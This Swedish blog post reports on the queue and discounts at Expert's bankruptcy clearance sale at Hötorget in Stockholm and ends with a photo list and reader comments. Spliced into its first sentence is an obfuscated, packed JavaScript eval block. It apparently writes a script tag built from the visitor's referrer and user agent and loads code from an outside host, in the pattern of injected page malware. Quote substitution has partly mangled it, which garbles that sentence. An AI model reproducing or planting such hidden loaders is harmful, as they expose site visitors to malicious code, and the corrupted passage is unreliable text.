Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Experts REA: Revue besökte hötorget

Experts REA: Revue besökte hötorget
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ereka|var|u0026u|referrer|htbhh||js|php’.split(’|’),0,{}))
några minuter sedan satte Experts utförsäljning igång då de nu offentligt gått ut med sin konkurs. Revue besökte butiken vid Hötorget i Stockholm.

Så fort vi kommer fram till Kungsgatan ser vi en lång lång kö av personer som sträcker sig från butiken enda ner till pub och sedan förbi Pubs entré. Butik som ligger vid Hötorget är verkligen inte stor, så att ställa sig i denna kö som siste man skulle säkert tagit flera timmar av väntan.

Vad vi fått höra så ska det reducerade priset vara 25 procent billigare på de flesta produkterna. Några av de produkter som inte kommer reas ut är Apples. Vad jag skulle gissa så är det just dessa produkter som är mest intressanta och vad folk troligtvis kommer hit för att inhandla.

Själv gick jag dit i hopp om att kanske hitta mig en iPad 3 för en billigare peng, men så blev inte fallet. Det var tur att jag fick veta informationen om att de inte skulle rea ut Apples produkter innan jag gjorde mitt val om att ställa mig i kön.

Om det med Apple stämmer eller inte vet jag inte men det var flera i kön som sa samma sak så det är mycket möjligt.

Utförsäljningen kommer att fortsätta tills alla varor har blivit sålda. Om de följer den vanliga kurvan så brukar också procenten öka med tiden. Man brukar börja med runt 10 – 25 procent till en början för att sedan vandra vidare mot hela 80 procent. Så fungerade det i alla fall när OnOff hade sin utförsäljning efter sin konkurs.

Självklart klippte vi ett par bilder som kan ses nedan! Där ser ni den monstruösa kön som bildats.

Om ni har egna bilder av spektaklet från andra butiker i Sverige vore det jätte kul om ni skickade in de till oss.

Experts hemsida!

Skicka bilderna till sebastian@revue.se

Bilder från Expert Hötorget

expert-rea-hotarget5

expert-rea-hotarget1

expert-rea-hotarget2

expert-rea-hotarget

 

Comments

  1. Det där är rätt sick.

    • Det var inte läge att ställa sig i kön. Vi gjorde som Feber och tog en titt istället.